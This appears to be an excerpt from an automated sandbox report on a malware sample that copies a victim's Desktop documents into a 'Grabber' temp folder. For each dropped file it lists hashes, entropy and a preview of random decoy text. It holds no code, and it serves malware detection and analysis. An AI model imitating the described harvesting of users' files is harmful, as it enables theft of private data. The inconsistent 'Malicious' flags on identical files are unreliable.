ICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV\GRXZDKKVDB.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PWCCAWLGRE.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	true
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SQSJKEBWDT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\SUAVTZKNFL.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
